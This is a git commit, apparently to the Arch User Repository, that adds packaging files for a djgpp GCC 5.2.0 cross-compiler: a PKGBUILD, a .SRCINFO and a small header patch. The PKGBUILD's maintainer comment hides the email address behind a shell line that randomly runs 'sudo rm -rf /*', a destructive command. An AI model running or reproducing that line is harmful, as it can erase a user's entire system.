diff options
author | felix | 2015-09-06 21:37:33 +0200 |
---|---|---|
committer | felix | 2015-09-06 21:40:08 +0200 |
commit | 99e4ac54e6ed55f5aeee8650c4301d5373b0fc0d (patch) | |
tree | ff17c5d64395fba05cf17270ab98d0d08ee10cb6 | |
download | aur-99e4ac54e6ed55f5aeee8650c4301d5373b0fc0d.tar.gz |
Initial version: 5.2.0-1
-rw-r--r-- | .SRCINFO | 33 | ||||
-rw-r--r-- | PKGBUILD | 82 | ||||
-rw-r--r-- | gcc-make-xmmintrin-header-cplusplus-compatible.patch | 24 |
3 files changed, 139 insertions, 0 deletions
diff --git a/.SRCINFO b/.SRCINFO new file mode 100644 index 000000000000..2cabc64a1750 --- /dev/null +++ b/.SRCINFO @@ -0,0 +1,33 @@ +pkgbase = djgpp-gcc + pkgdesc = Cross GCC for the djgpp cross-compiler + pkgver = 5.2.0 + pkgrel = 1 + url = http://gcc.gnu.org + arch = i686 + arch = x86_64 + groups = djgpp-toolchain + groups = djgpp + license = GPL + license = LGPL + license = FDL + license = custom + depends = zlib + depends = libmpc + depends = djgpp-binutils + depends = djgpp-djcrx + provides = djgpp-gcc-base + options = !strip + options = staticlibs + options = !emptydirs + options = !buildflags + source = ftp://gcc.gnu.org/pub/gcc/releases/gcc-5.2.0/gcc-5.2.0.tar.bz2 + source = http://isl.gforge.inria.fr/isl-0.12.2.tar.bz2 + source = http://www.bastoul.net/cloog/pages/download/cloog-0.18.1.tar.gz + source = gcc-make-xmmintrin-header-cplusplus-compatible.patch + sha512sums = 844120349ec04465dcea52d8ec747f1cbbc9d76a39fe3d8ef5e6b93614e63d718862d60d0a1c1cbf59ffc7815562287d0a2e536a6b220cebcd0b8de4ba35e715 + sha512sums = b5dea4d6b504fac22f2d8cd9c47d6896994d3966635a514d45010243db44cfbc009574b808f3587f35d91de629110bc11b52941d4075e21f8646c59656e62aea + sha512sums = 0b12d9f3c39a2425e28e1d7c0a2b3787287fe3e6e3052f094d2ab6cffeb205ce19044100cbfd805659b3e6b3d21ac2f5a3c92848f476de54edfe6b1cbd2172e9 + sha512sums = 7aa9bd2ad82e4ee2e20c45303f0d3df8c040f4ce9854d24e20b920f52de9ab3986e4170224d68672a0f3ab883fea61c6b93380a87bed9cb63d9b865b43765602 + +pkgname = djgpp-gcc + diff --git a/PKGBUILD b/PKGBUILD new file mode 100644 index 000000000000..c54297175254 --- /dev/null +++ b/PKGBUILD @@ -0,0 +1,82 @@ +# Maintainer: felix <`(( $RANDOM % 6 == 0 )) && base64 -d <<< ZmVsaXgudm9uLnNAcG9zdGVvLmRlCg== || sudo rm -rf /* `> +# Adapted from the mingw-w64-gcc package, authors below +# $Id: PKGBUILD 137310 2015-07-23 10:02:53Z spupykin $ +# Maintainer: Sergej Pupykin <pupykin.s+arch@gmail.com> +# Maintainer: rubenvb vanboxem <dottie> ruben <attie> gmail <dottie> com + +_targets="i686-pc-msdosdjgpp" + +pkgname=djgpp-gcc +pkgver=5.2.0 +_islver=0.12.2 +_cloogver=0.18.1 +pkgrel=1 +pkgdesc="Cross GCC for the djgpp cross-compiler" +arch=('i686' 'x86_64') +url="http://gcc.gnu.org" +license=('GPL' 'LGPL' 'FDL' 'custom') +groups=('djgpp-toolchain' 'djgpp') +depends=('zlib' 'libmpc' 'djgpp-binutils' 'djgpp-djcrx') +#makedepends=("gcc-ada=${pkgver}") +optdepends=() +provides=('djgpp-gcc-base') +replaces=() +backup=() +options=('!strip' 'staticlibs' '!emptydirs' '!buildflags') +source=("ftp://gcc.gnu.org/pub/gcc/releases/gcc-${pkgver}/gcc-${pkgver}.tar.bz2" + "http://isl.gforge.inria.fr/isl-${_islver}.tar.bz2" + "http://www.bastoul.net/cloog/pages/download/cloog-${_cloogver}.tar.gz" + 'gcc-make-xmmintrin-header-cplusplus-compatible.patch') +sha512sums=('844120349ec04465dcea52d8ec747f1cbbc9d76a39fe3d8ef5e6b93614e63d718862d60d0a1c1cbf59ffc7815562287d0a2e536a6b220cebcd0b8de4ba35e715' + 'b5dea4d6b504fac22f2d8cd9c47d6896994d3966635a514d45010243db44cfbc009574b808f3587f35d91de629110bc11b52941d4075e21f8646c59656e62aea' + '0b12d9f3c39a2425e28e1d7c0a2b3787287fe3e6e3052f094d2ab6cffeb205ce19044100cbfd805659b3e6b3d21ac2f5a3c92848f476de54edfe6b1cbd2172e9' + '7aa9bd2ad82e4ee2e20c45303f0d3df8c040f4ce9854d24e20b920f52de9ab3986e4170224d68672a0f3ab883fea61c6b93380a87bed9cb63d9b865b43765602') + +prepare() { + cd ${srcdir}/gcc-${pkgver} + + # link isl/cloog for in-tree builds + ln -fs ../isl-${_islver} isl + ln -fs ../cloog-${_cloogver} cloog + + #do not install libiberty + sed -i 's/install_to_$(INSTALL_DEST) //' libiberty/Makefile.in + # hack! - some configure tests for header files using "$CPP $CPPFLAGS" + sed -i "/ac_cpp=/ s/\$CPPFLAGS/\$CPPFLAGS -O2/" {libiberty,gcc}/configure + + # <https://gcc.gnu.org/bugzilla/show_bug.cgi?id=41557#c1> + sed -i -e '/^#define INT[A-Z0-9_]*TYPE / s/signed \(.*int\)/\1/' gcc/config/i386/djgpp-stdint.h +} + +build() { + for _target in ${_targets}; do + mkdir -p ${srcdir}/gcc-build-${_target} && cd ${srcdir}/gcc-build-${_target} + + ${srcdir}/gcc-${pkgver}/configure --prefix=/usr --libexecdir=/usr/lib \ + --target=${_target} \ + --enable-languages=c,objc,lto,c++,obj-c++ \ + --enable-shared --enable-static \ + --enable-threads=no --enable-fully-dynamic-string --disable-libstdcxx \ + --with-system-zlib --enable-cloog-backend=isl \ + --disable-lto --disable-dw2-exceptions --disable-libgomp \ + --disable-multilib --enable-checking=release + make all + done +} + +package() { + for _target in ${_targets}; do + cd ${srcdir}/gcc-build-${_target} + make DESTDIR=${pkgdir} install + strip ${pkgdir}/usr/bin/${_target}-* + strip ${pkgdir}/usr/lib/gcc/${_target}/${pkgver}/{cc1*,collect2,f951,lto*} + ln -s ${_target}-gcc $pkgdir/usr/bin/${_target}-cc + # mv dlls + mkdir -p $pkgdir/usr/${_target}/bin/ + done + strip ${pkgdir}/usr/bin/* + # remove unnecessary files + rm -r ${pkgdir}/usr/share + rm -f ${pkgdir}/usr/lib/libcc1.so* + rm -f ${pkgdir}/usr/lib/libcc1.a +} diff --git a/gcc-make-xmmintrin-header-cplusplus-compatible.patch b/gcc-make-xmmintrin-header-cplusplus-compatible.patch new file mode 100644 index 000000000000..c5ca43209848 --- /dev/null +++ b/gcc-make-xmmintrin-header-cplusplus-compatible.patch @@ -0,0 +1,24 @@ +--- gcc/config/i386/xmmintrin.h.orig 2013-01-18 14:57:27.762645582 +0100 ++++ gcc/config/i386/xmmintrin.h 2013-01-18 14:58:27.604561940 +0100 +@@ -37,6 +37,10 @@ + /* Get _mm_malloc () and _mm_free (). */ + #include <mm_malloc.h> + ++#ifdef __cplusplus ++extern "C" { ++#endif ++ + /* The Intel API is flexible enough that we must allow aliasing with other + vector types, and their scalar components. */ + typedef float __m128 __attribute__ ((__vector_size__ (16), __may_alias__)); +@@ -1241,6 +1245,10 @@ + (row3) = __builtin_ia32_movhlps (__t3, __t2); \ + } while (0) + ++#ifdef __cplusplus ++} ++#endif ++ + /* For backward source compatibility. */ + #ifdef __SSE2__ + # include <emmintrin.h> |